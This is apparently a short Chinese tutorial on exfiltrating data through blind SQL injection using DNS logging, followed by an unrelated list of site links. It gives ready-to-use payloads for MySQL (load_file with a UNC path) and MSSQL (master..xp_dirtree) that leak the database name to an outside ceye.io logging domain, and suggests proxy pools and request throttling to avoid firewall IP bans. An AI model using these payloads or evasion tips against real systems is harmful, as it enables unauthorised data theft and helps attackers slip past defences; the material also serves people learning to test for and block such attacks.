当前位置: 首页 > article >正文

SQL注入无回显,利用DNSlog构造方式

  1. 没有回显的情况下,一般编写脚本,进行自动化注入。但与此同时,由于

防火墙的存在,容易被封禁 IP,可以尝试调整请求频率,有条件的使用代理池进行请求。

  1. 此时也可以使用 DNSlog 注入,原理就是把服务器返回的结果放在域名中,然后读取 DNS 解析时的日志,来获取想要的信息。
  2. Mysql 中利用load_file()构造payload

‘ and if((select load_file(concat(‘\\\\’,(select database()),’.xxx.ceye.io\\abc’))),1,0)#

  1. Mssql 下利用 master..xp_dirtree 构造 payload

DECLARE @host varchar(1024);SELECT @host=(SELECT db_name())+’.xxx.ceye.io’;EXEC(‘master..xp_dirtree”\’+@host+’

\foobar$”‘);

 


http://www.kler.cn/a/271700.html

相关文章:

  • AI在自动化测试中的伦理挑战
  • 【go语言】gorm 快速入门
  • 【Redis】 String 类型的介绍和常用命令
  • Ubuntu全面卸载mysql
  • 计算机网络 IP 网络层 2 (重置版)
  • RPC是什么?和HTTP区别?
  • 力扣-3. 无重复字符的最长子串
  • Vue+SpringBoot打造康复中心管理系统
  • Pandas中高效选择和替换操作总结
  • Kubernetes operator系列:webhook 知识学习
  • PHP8编译安装
  • RequestResponse案例
  • 【JVM】生产内存占用异常优化 (一)
  • 前端跨平台开发框架:简化多端开发的利器
  • 一文总结python的异常数据处理示例
  • Python实战:Matplotlib绘图基础与实践
  • 科研绘图一:箱线图(添加贝赛尔曲线)
  • Android Studio字体大小调节
  • 记录对NSIS的一些微调 实现Electron安装包美化
  • 鸿蒙Harmony应用开发—ArkTS声明式开发(基础手势:Rating)
  • 数据结构 之 树
  • SSA-LSTM多输入分类预测 | 樽海鞘优化算法-长短期神经网络 | Matlab
  • 2024.3.17每日一题
  • 【C语言】关于字符的一些实用函数
  • JS:轮播图终极版
  • kafka集群介绍